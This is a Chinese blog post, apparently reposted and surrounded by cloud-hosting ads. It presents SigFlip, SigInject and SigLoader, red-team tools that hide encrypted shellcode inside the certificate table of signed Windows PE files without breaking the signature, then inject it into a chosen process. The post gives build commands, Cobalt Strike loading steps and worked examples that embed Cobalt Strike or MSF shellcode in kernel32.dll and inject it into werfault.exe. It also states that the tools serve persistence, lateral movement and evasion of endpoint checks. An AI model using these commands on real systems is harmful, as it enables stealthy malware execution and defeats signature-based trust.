阿里云-云小站(无限量代金券发放中)
【腾讯云】云服务器、云数据库、COS、CDN、短信等热卖云产品特惠抢购

SigFlip如何篡改身份认证码签名的PE文件

74次阅读
没有评论

共计 2330 个字符,预计需要花费 6 分钟才能阅读完成。

导读 SigFlip 是一款能够篡改经过身份认证码签名的 PE 文件(exe、dll、sys 等)的工具,而且整个过程不会影响或破坏已有的身份认证码签名。

SigFlip 如何篡改身份认证码签名的 PE 文件

关于 SigFlip

SigFlip 是一款能够篡改经过身份认证码签名的 PE 文件 (exe、dll、sys 等) 的工具,而且整个过程不会影响或破坏已有的身份认证码签名。换句话来说,就是我们可以使用 SigFlip 向 PE 文件中嵌入数据(比如 Shellcode),并且再不会破坏文件签名、完整性检查或 PE 文件功能的情况下,修改 PE 文件的校验和或哈希。

SigInject 组件可以将 Shellcode 注入至 PE 文件的 [WIN_CERTIFICATE] 证书表中,并输出加密密钥以便配合 BOF/C/C# 加载器 (SigLoader) 一起使用。SigInject 将保存针对 PE 文件的修改操作,并保证其签名和证书有效性不变。

SigLoader 是一个基础加载器,它采用 SigInject 创建的修改后的 PE 文件路径和解密密钥作为参数,然后提取和解密嵌入的 Shellcode,以供选择 Shellcode 注入使用。

SigFlip 将检查 PE 哈希是否已成功更改,然后退出以绕过终端针对此类行为的检查。

SigFlip 可以用于持久化感染、横向渗透以及命令 / 代码执行等场景。

注意事项:igFlip、SigInject 和 SigLoader 将以 BOF 脚本和.NET 程序集提供。

工具安装

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/med0x2e/SigFlip.git
工具构建 / 编译

本项目并没有提供预编译的 BOF,我们可以使用 Mingw-w64 来进行编译。如果是.NET,可以使用 VS 或 csc.exe 来编译.NET 项目(SigFlip、SigLoader); 如果是 BOF,请按照下列步骤操作:

➜ i686-w64-mingw32-gcc -c sigflip.c -o sigflip.x86.o 
 
➜ x86_64-w64-mingw32-gcc -c sigflip.c -o sigflip.x64.o 
 
➜ x86_64-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x64.o 
 
➜ i686-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x86.o

确保所有的对象文件都存储在 sigflip.cna 的相同目录下,然后在 Cobalt Strike 中加载 sigflip.cna。

注意事项:预编译的 BOF 使用的是 mingw-64 v8.0.0_3,如果你所使用的 mingw-64 >= v9,可能会出现崩溃的情况。

Cobalt Strike

执行程序集:

execute-assembly SigFlip.exe -h 
 
execute-assembly SigLoader -h

BOF:

当我们在 Cobalt Strike 中加载 sigflip.cna 了之后,将会注册两个新命令,我们此时就能够以下列方式使用 SigFlip 和 SigInject 了。

  • SigFlip:在不破坏签名或证书有效性的情况下,修改 PE 文件哈希:
    SigFlip "" "" 
  • SigInject:向 PE 文件的 [WIN_CERTIFICATE] 证书表中注入加密的 Shellcode,打印的加密密钥可以跟基础 C /C# 加载器结合使用以保证签名和证书的完整性:
    SigInject " " "" 
  • SigLoader:从 PE 文件中加载由 SigInject 加密的 Shellcode,然后使用 Early Bird 向指定进程注入 Shellcode,我们可以自定义 Shellcode 的注入逻辑,或直接替换目标代码:
    SigLoader     
工具使用样例

(1) BOF

向 msbuild.exe 注入随机数据:

SigFlip "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" "C:\lolbins\modified-msbuild.exe"

向 kernel32.ell 注入 Shellcode:

SigInject "C:\Windows\System32\kernel32.dll" "C:\random\modified-kernel32.dll" "C:\shellcode\cobaltstrike_or_msf_shellcode.bin" 
 
Sigloader "C:\random\modified-kernel32.dll" "DECRYPTION_KEY" "C:\Windows\System32\werfault.exe" 6300

(2) 执行程序集

向 msbuild.exe 注入随机数据:

execute-assembly SigFlip.exe -b C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -o C:\Temp\MSBuild.exe

向 kernel32.ell 注入 Shellcode:

execute-assembly SigFlip.exe -i C:\Windows\System32\kernel32.dll -s C:\Temp\x86shellcode.bin -o C:\Temp\kernel32.dll -e TestSecretKey 
 
execute-assembly SigLoader.exe -f C:\Temp\modified-kernel32.dll -e TestSecretKey -pid 2354

阿里云 2 核 2G 服务器 3M 带宽 61 元 1 年,有高配

腾讯云新客低至 82 元 / 年,老客户 99 元 / 年

代金券:在阿里云专用满减优惠券

正文完
星哥玩云-微信公众号
post-qrcode
 0
星锅
版权声明:本站原创文章,由 星锅 于2024-07-25发表,共计2330字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
【腾讯云】推广者专属福利,新客户无门槛领取总价值高达2860元代金券,每种代金券限量500张,先到先得。
阿里云-最新活动爆款每日限量供应
评论(没有评论)
验证码
【腾讯云】云服务器、云数据库、COS、CDN、短信等云产品特惠热卖中